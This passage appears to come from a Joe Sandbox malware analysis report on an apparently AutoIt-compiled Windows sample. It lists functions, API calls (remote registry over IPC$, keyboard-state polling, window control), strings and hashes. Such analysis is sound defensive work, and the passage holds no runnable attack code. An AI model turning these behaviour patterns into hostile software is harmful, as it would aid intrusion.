                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2751501086-0
                                                                                                                                                  • Opcode ID: 5a3e956c3ceb505703d86ab17b8e4ac1c6bbe82a8890a387f59828a7d38799c4
                                                                                                                                                  • Instruction ID: e00fc31d1fe8e7c7b73818e1cc8358f275495fd980a4662fb4bc3a831bd0b810
                                                                                                                                                  • Opcode Fuzzy Hash: 5a3e956c3ceb505703d86ab17b8e4ac1c6bbe82a8890a387f59828a7d38799c4
                                                                                                                                                  • Instruction Fuzzy Hash: AA710330604709BEEB209B55DC85FEAFFA4FF05364F244216F524AA2D1E7B069D0EB94
                                                                                                                                                  Function 00C183FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1821: _memmove.LIBCMT ref: 00BD185B
                                                                                                                                                  • _memset.LIBCMT ref: 00C18489
                                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000,\IPC$,?), ref: 00C184BE
                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?,\CLSID,?,SOFTWARE\Classes\), ref: 00C184DA
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C184F6
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C18520
                                                                                                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C18548
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C18553
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C18558
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                  • API String ID: 1411258926-22481851
                                                                                                                                                  • Opcode ID: 15640985f00e670a27ac24a4489ef0cd7eb593aec371ba0613d2fa7659d0f569
                                                                                                                                                  • Instruction ID: b17c411e541c7739fc865601f540899ae21a766811d7919691d932f783c23597
                                                                                                                                                  • Opcode Fuzzy Hash: 15640985f00e670a27ac24a4489ef0cd7eb593aec371ba0613d2fa7659d0f569
                                                                                                                                                  • Instruction Fuzzy Hash: D6411A76C1022DABCF11EFA4DC55EEDB7B8FF04341F04456AE815A22A1EB319E44CB90
                                                                                                                                                  Function 00C4147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C4040D,?,?), ref: 00C41491
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                  • API String ID: 3964851224-909552448
                                                                                                                                                  • Opcode ID: cd78316eb6821f30e829c973f90d62707f2b06543c29e9e5b509ce9453931b0a
                                                                                                                                                  • Instruction ID: 98994f39503765644940f6f01a29fb73ca4cf515f269f03537c7b0a6170cf528
                                                                                                                                                  • Opcode Fuzzy Hash: cd78316eb6821f30e829c973f90d62707f2b06543c29e9e5b509ce9453931b0a
                                                                                                                                                  • Instruction Fuzzy Hash: 7B417C7051025ADBCF00EF55DC81AEE3764BF51310F6484A9FCA65B292DB70EE99CB60
                                                                                                                                                  Function 00C25882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1821: _memmove.LIBCMT ref: 00BD185B
                                                                                                                                                    • Part of subcall function 00BD153B: _memmove.LIBCMT ref: 00BD15C4
                                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000, alias PlayMe,00000022,?,00000022,open ), ref: 00C258EB
                                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000,?,00000022,open ), ref: 00C25901
                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000,?,00000022,open ), ref: 00C25912
                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000,?,00000022,open ), ref: 00C25924
                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000,?,00000022,open ), ref: 00C25935
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: SendString$_memmove
                                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                  • API String ID: 2279737902-1007645807
                                                                                                                                                  • Opcode ID: 652caab382c9f05521a9f24d16a7c7efda7f8f52c50a54d607d74a78ed66886a
                                                                                                                                                  • Instruction ID: 7472b72d37048f581db4e2be8f9ed3e5a19b3f8f729b638086f6fb0438eba998
                                                                                                                                                  • Opcode Fuzzy Hash: 652caab382c9f05521a9f24d16a7c7efda7f8f52c50a54d607d74a78ed66886a
                                                                                                                                                  • Instruction Fuzzy Hash: A711E630950129B9D710B7A5DC5AEFFBBBCEBA1B50F40087AB419A21E0EE701D81C5A0
                                                                                                                                                  Function 00C24C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcscpy$#115#116_memmove_strcat
                                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                                  • API String ID: 1745391200-3771769585
                                                                                                                                                  • Opcode ID: f62f8c95c623444d5989e451df054525432fc94061961abd44bf5f422a149c80
                                                                                                                                                  • Instruction ID: 4e064d585052604200228b717b5a24ee10ca10093d5850716c522d308f073675
                                                                                                                                                  • Opcode Fuzzy Hash: f62f8c95c623444d5989e451df054525432fc94061961abd44bf5f422a149c80
                                                                                                                                                  • Instruction Fuzzy Hash: 7011E735505228ABCB25A769EC4AFEE77BCDF40711F1401A5F409E6192EF709AC18A90
                                                                                                                                                  Function 00C25530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • timeGetTime.WINMM ref: 00C25535
                                                                                                                                                    • Part of subcall function 00BE083E: timeGetTime.WINMM(?,00000002,00BCC22C), ref: 00BE0842
                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00C25561
                                                                                                                                                  • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00C25585
                                                                                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C255A7
                                                                                                                                                  • SetActiveWindow.USER32 ref: 00C255C6
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C255D4
                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C255F3
                                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00C255FE
                                                                                                                                                  • IsWindow.USER32 ref: 00C2560A
                                                                                                                                                  • EndDialog.USER32(00000000), ref: 00C2561B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                  • String ID: BUTTON
                                                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                                                  • Opcode ID: 4229d156664095e73bfab5dd4686e60f3740233afb4682c198a1ba9b0f32a9d0
                                                                                                                                                  • Instruction ID: 43f362a29e78914eb3699509db36348f06dfb885e71b62d78a4dd43695e00b40
                                                                                                                                                  • Opcode Fuzzy Hash: 4229d156664095e73bfab5dd4686e60f3740233afb4682c198a1ba9b0f32a9d0
                                                                                                                                                  • Instruction Fuzzy Hash: 33219D78244B05EFE7405F60FC89B2E3B6AEB44346FA01028F401D1AA1DF718D94DB2A
                                                                                                                                                  Function 00C2DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC4D37: __itow.LIBCMT ref: 00BC4D62
                                                                                                                                                    • Part of subcall function 00BC4D37: __swprintf.LIBCMT ref: 00BC4DAC
                                                                                                                                                  • CoInitialize.OLE32(00000000,00C50980), ref: 00C2DC2D
                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C2DCC0
                                                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00C2DCD4
                                                                                                                                                  • CoCreateInstance.OLE32(00C53D4C,00000000,00000001,00C7B86C,?), ref: 00C2DD20
                                                                                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C2DD8F
                                                                                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00C2DDE7
                                                                                                                                                  • _memset.LIBCMT ref: 00C2DE24
                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00C2DE60
                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?,?), ref: 00C2DE83
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00C2DE8A
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C2DEC1
                                                                                                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00C2DEC3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1246142700-0
                                                                                                                                                  • Opcode ID: 64e17448e9e6cbbd0e7e84ecf8398ac87d52fee72678ddbfcd45030b3d0caa8c
                                                                                                                                                  • Instruction ID: 952b4bdf1ec8a656d2587b472e686369e919606fec5030f7dd99ce8b3e41363e
                                                                                                                                                  • Opcode Fuzzy Hash: 64e17448e9e6cbbd0e7e84ecf8398ac87d52fee72678ddbfcd45030b3d0caa8c
                                                                                                                                                  • Instruction Fuzzy Hash: 54B10D75A00219AFDB04DF64C898EAEBBF9FF48305B148499F916EB251DB30EE45CB50
                                                                                                                                                  Function 00C2081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00C20896
                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00C20901
                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00C20921
                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00C20938
                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00C20967
                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00C20978
                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00C209A4
                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00C209B2
                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00C209DB
                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00C209E9
                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00C20A12
                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00C20A20
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                  • Opcode ID: 6f32589a742691189cd733c2eb98b744cd331b2d126bdd7c5a5337a6810681d2
                                                                                                                                                  • Instruction ID: 8467daeccb602742639645ce04a67f665b1c4cd733a08b1ad67df391b5bc85c0
                                                                                                                                                  • Opcode Fuzzy Hash: 6f32589a742691189cd733c2eb98b744cd331b2d126bdd7c5a5337a6810681d2
                                                                                                                                                  • Instruction Fuzzy Hash: 80510B349047A829FB34EBB054117AABFB49F11380F58459FC9D2579C3DA649B8CCBA1
                                                                                                                                                  Function 00C1CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00C1CE1C
                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00C1CE2E
                                                                                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C1CE8C
                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00C1CE97
                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00C1CEA9
                                                                                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C1CEFD
                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C1CF0B
                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00C1CF1C
                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C1CF5F
                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00C1CF6D
                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C1CF8A
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C1CF97
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                                  • Opcode ID: a9af531ac06a793fcd3973e6a38ffbe65df573e9aaa7f60012c7ae054ba05824
                                                                                                                                                  • Instruction ID: ba7bb9bbded7d94424438a4eda51f0657d61ca7744e9071cc892b12b7ed5d4ce
                                                                                                                                                  • Opcode Fuzzy Hash: a9af531ac06a793fcd3973e6a38ffbe65df573e9aaa7f60012c7ae054ba05824
                                                                                                                                                  • Instruction Fuzzy Hash: 0E515475B40305AFDB18CFA8CD95BAEBBB6EB88711F14812DF915E7290DB709D408B50
                                                                                                                                                  Function 00BC23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BC2412,?,00000000,?,?,?,?,00BC1AA7,00000000,?), ref: 00BC1F76
                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BC24AF
                                                                                                                                                  • KillTimer.USER32(-00000001,?,?,?,?,00BC1AA7,00000000,?,?,00BC1EBE,?,?), ref: 00BC254A
                                                                                                                                                  • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,00BC1AA7,00000000,?,?,00BC1EBE,?,?), ref: 00BFBFE7
                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC1AA7,00000000,?,?,00BC1EBE,?,?), ref: 00BFC018
                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC1AA7,00000000,?,?,00BC1EBE,?,?), ref: 00BFC02F
                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC1AA7,00000000,?,?,00BC1EBE,?,?), ref: 00BFC04B
                                                                                                                                                  • DeleteObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BFC05D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 641708696-0
                                                                                                                                                  • Opcode ID: c9ed37990359b58a6da8b7588a7debf65ddffa83fadebbbf0f20971950056e04
                                                                                                                                                  • Instruction ID: 818ce8816fb9ee0a4ae90002359f0d8f3efc9c6d58888d33370f05143fb7253c
                                                                                                                                                  • Opcode Fuzzy Hash: c9ed37990359b58a6da8b7588a7debf65ddffa83fadebbbf0f20971950056e04
                                                                                                                                                  • Instruction Fuzzy Hash: 5C617C34504705DFDB299F24C948F3A7BF1FB40316F2086ACE552A7AA0CB70A891DFA4
                                                                                                                                                  Function 00BC2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1AE0,?,?,?,?,?,?,00BC1D8F,?,?,?), ref: 00BC29BC
                                                                                                                                                  • GetSysColor.USER32(0000000F,?,?,?,?), ref: 00BC25AF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ColorLongWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 259745315-0
                                                                                                                                                  • Opcode ID: edd8f690be1d166cb2f90da0d43c5a025d7eebce133b69206e641d24292bf59b
                                                                                                                                                  • Instruction ID: c4bac1c4cd2922060d2983e842d5c29d7c3281e7931cbe90e2e9ccab558c24e3
                                                                                                                                                  • Opcode Fuzzy Hash: edd8f690be1d166cb2f90da0d43c5a025d7eebce133b69206e641d24292bf59b
                                                                                                                                                  • Instruction Fuzzy Hash: 2B41B535104644AFDB255F289888FBD3BA5EB0A331F2542A9FE659B1E2D7308C81DB25
                                                                                                                                                  Function 00BD29BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BE0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00BD2A3E,?,00008000), ref: 00BE0BA7
                                                                                                                                                    • Part of subcall function 00BE0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BD2A58,?,00008000), ref: 00BE02A4
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BD2ADF
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00BD2C2C
                                                                                                                                                    • Part of subcall function 00BD3EBE: _wcscpy.LIBCMT ref: 00BD3EF6
                                                                                                                                                    • Part of subcall function 00BE386D: _iswctype.LIBCMT ref: 00BE3875
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                  • API String ID: 537147316-3738523708
                                                                                                                                                  • Opcode ID: 0dc49f36c2e7afab199207eaab716868cd832a42f44f990ce540813184c1f0e6
